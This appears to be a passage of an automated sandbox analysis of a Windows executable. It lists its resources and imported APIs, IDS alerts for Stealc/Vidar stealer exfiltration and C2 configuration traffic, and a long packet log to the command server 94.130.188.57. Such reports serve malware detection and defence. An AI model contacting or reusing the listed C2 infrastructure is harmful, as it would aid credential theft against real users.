| RT_ICON | 0x149b40 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6391843971631206 |
| RT_DIALOG | 0x149fa8 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x14a0a8 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x14a1c4 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x14a224 | 0x5a | data | English | United States | 0.7888888888888889 |
| RT_MANIFEST | 0x14a280 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |
| DLL | Import |
|---|---|
| KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
| USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
                                                                                                                                                                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T06:23:45.287338+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.5 | 49754 | 94.130.188.57 | 443 | TCP
2024-12-23T06:23:49.871078+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 94.130.188.57 | 443 | 192.168.2.5 | 49767 | TCP
2024-12-23T06:23:52.172957+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.5 | 49772 | 94.130.188.57 | 443 | TCP
2024-12-23T06:23:52.173133+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 94.130.188.57 | 443 | 192.168.2.5 | 49772 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.584470987 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.584501028 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586199045 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586250067 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586369038 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586622953 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:47.586644888 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989240885 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989320040 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989834070 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.989842892 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.991714954 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:48.991719961 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870888948 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870908976 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870969057 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.870969057 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871026039 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871068001 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871501923 CET49767443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.871557951 CET4434976794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873380899 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873399973 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873493910 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873713017 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:49.873722076 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.273746967 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.273972034 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.274935961 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.274943113 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.277575970 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:51.277580023 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.172955990 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173015118 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173022032 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173078060 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173213005 CET49772443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.173228979 CET4434977294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189524889 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189575911 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189644098 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189810991 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:52.189821959 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187117100 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187180996 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187306881 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187594891 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.187611103 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.603087902 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.603375912 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.604552984 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.604566097 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606513023 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606518984 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606616974 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:53.606637955 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.571973085 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.572043896 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.572057962 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.572098017 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.575576067 CET49778443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.575592041 CET4434977894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.587883949 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.588006020 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.588896036 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.588900089 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.591789961 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:54.591794968 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630387068 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630453110 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630465031 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630490065 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630536079 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.630536079 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.691054106 CET49780443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.691068888 CET4434978094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.929589987 CET49790443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.929629087 CET44349790142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.001009941 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.001025915 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.010380983 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.010438919 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.010451078 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.023704052 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.023757935 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.023777008 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.037440062 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.037523031 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.037545919 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.050221920 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.050276041 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.050293922 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.063990116 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.064192057 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.064203024 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.077578068 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.077644110 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.077661037 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.088572025 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.088679075 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.088690996 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.101950884 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.103055000 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.103070974 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.115700960 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.115781069 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.115793943 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.129281044 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.129395008 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.129410982 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.170401096 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.181314945 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.183644056 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.183739901 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.183763981 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.193344116 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.193422079 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.193435907 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.206274986 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.206363916 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.206376076 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.217986107 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.218071938 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.218085051 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.229629993 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.229692936 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.229712009 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240535021 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240611076 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240614891 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240639925 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.240684986 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.251276016 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.261457920 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.261519909 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.261528969 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271023989 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271145105 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271224022 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271234035 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.271286011 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.280599117 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.290117979 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.290205002 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.290214062 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299099922 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299138069 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299258947 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.299277067 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.302922964 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.307812929 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.316281080 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.316353083 CET49793443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.316385984 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:59.324604988 CET44349793142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961020947 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961033106 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961078882 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961091042 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961133003 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961143970 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961184025 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961194992 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961446047 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:03.961451054 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.454839945 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.454881907 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.454961061 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.455276966 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:04.455287933 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933361053 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933475018 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933479071 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.933618069 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934004068 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934066057 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934436083 CET49820443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934451103 CET4434982094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934731007 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.934741020 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936815977 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936827898 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936978102 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.936995983 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937064886 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937076092 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937089920 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.937102079 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.951652050 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:05.951679945 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533058882 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533097029 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533296108 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533689976 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:06.533708096 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416817904 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416878939 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416894913 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.416997910 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417000055 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417263985 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417736053 CET49827443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.417748928 CET4434982794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.550884962 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.550961971 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.551211119 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.551536083 CET49837443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.551565886 CET4434983794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.934570074 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.934628963 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.935050011 CET49834443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.935062885 CET4434983494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:07.936949968 CET49834443192.168.2.594.130.188.57
